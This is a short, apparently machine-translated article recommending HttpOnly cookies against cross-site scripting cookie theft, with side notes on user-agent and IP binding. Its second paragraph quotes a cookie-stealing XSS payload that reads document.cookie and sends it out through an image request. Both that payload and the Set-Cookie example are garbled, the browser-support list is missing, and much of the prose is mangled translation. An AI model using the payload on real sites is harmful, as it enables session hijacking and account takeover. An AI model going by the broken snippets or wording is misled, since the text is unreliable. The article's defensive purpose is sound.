Use http-only cookie to prevent XSS attacks

WWW services rely on HTTP protocol implementation, HTTP is a stateless protocol, so in order to deliver information between each session, it is inevitably to mark the status of the visitor. Just get this cookie, you can get someone else, invade your personal account or website.

For websites, once the XSS vulnerability means that invaders can perform any JS scripts in the browser, it is very simple to get cookies. Cookies are saved in the browser’s Document object, as long as you read cookies with JS, you can have identity of others. A simple XSS attack statement is as follows:; cookiedocument.cookie; cnew image (); c.src “” + cookie + “& U” + URL;

Some websites take into account this issue, so taking browser binding technology, such as binding the cookie and browser’s user-agent, once the changes are discovered, it is considered to be cookies. But this method has a big drawback, because when the intruder steals cookie, he must have obtained the user-agent at the same time. There is another more stringent to bind the cookie and remove-addr (in fact, the IP binding), but it is possible to bring a relatively poor user experience, such as the home ADSL is one IP. address.

How to protect our sensitive cookie security? Through the above analysis, the general cookies are obtained from the Document object, and we just make sensitive cookies are not visible in the browser Document. Microsoft Internet Explorer version 6 Service Pack 1 and later support cookie properties http-only, which helps to alleviate cross-site scripting threats, if the compatible browser receives HTTP-ONLY cookies, the client script cannot access it. . The parameters of http-only are the same as other parameters such as Domain. Once http-only is set, you can’t see the cookies in the Document object of the browser, and the browser is not affected when browsing, because cookie will be Playing out in the browser head (including Ajax), the application will generally not operate these sensitive cookies in JS, I can use http-only for some sensitive cookies, I can use http-only for some need to use JS in the website Well-operated cookies will not set up, so that the security of cookie information is guaranteed to ensure the basic functions of the website.

The following example is the setting method of http-only (note that the HTTPONLY property is not sensitive to case):

Set-cookie: [; ] [; Domain ] [; path ] [; secure] [httponly]


At present, mainstream browsers have basically supported http-only properties, and specific supported browsers are viewed:

In addition, HTTPONLY is not universal. First of all, it does not solve the problem of XSS, and still cannot resist some patient hackers attacks, and cannot prevent intruders from being submitted by AJAX. In order to reduce the damage caused by cross-site script attacks, HTTP-ONLY cookies and other technologies are often needed. If used alone, it cannot fully resist cross-site script attacks. For example, if your site is developed using ASP.NET, it is recommended to use Microsoft Web Protection Library.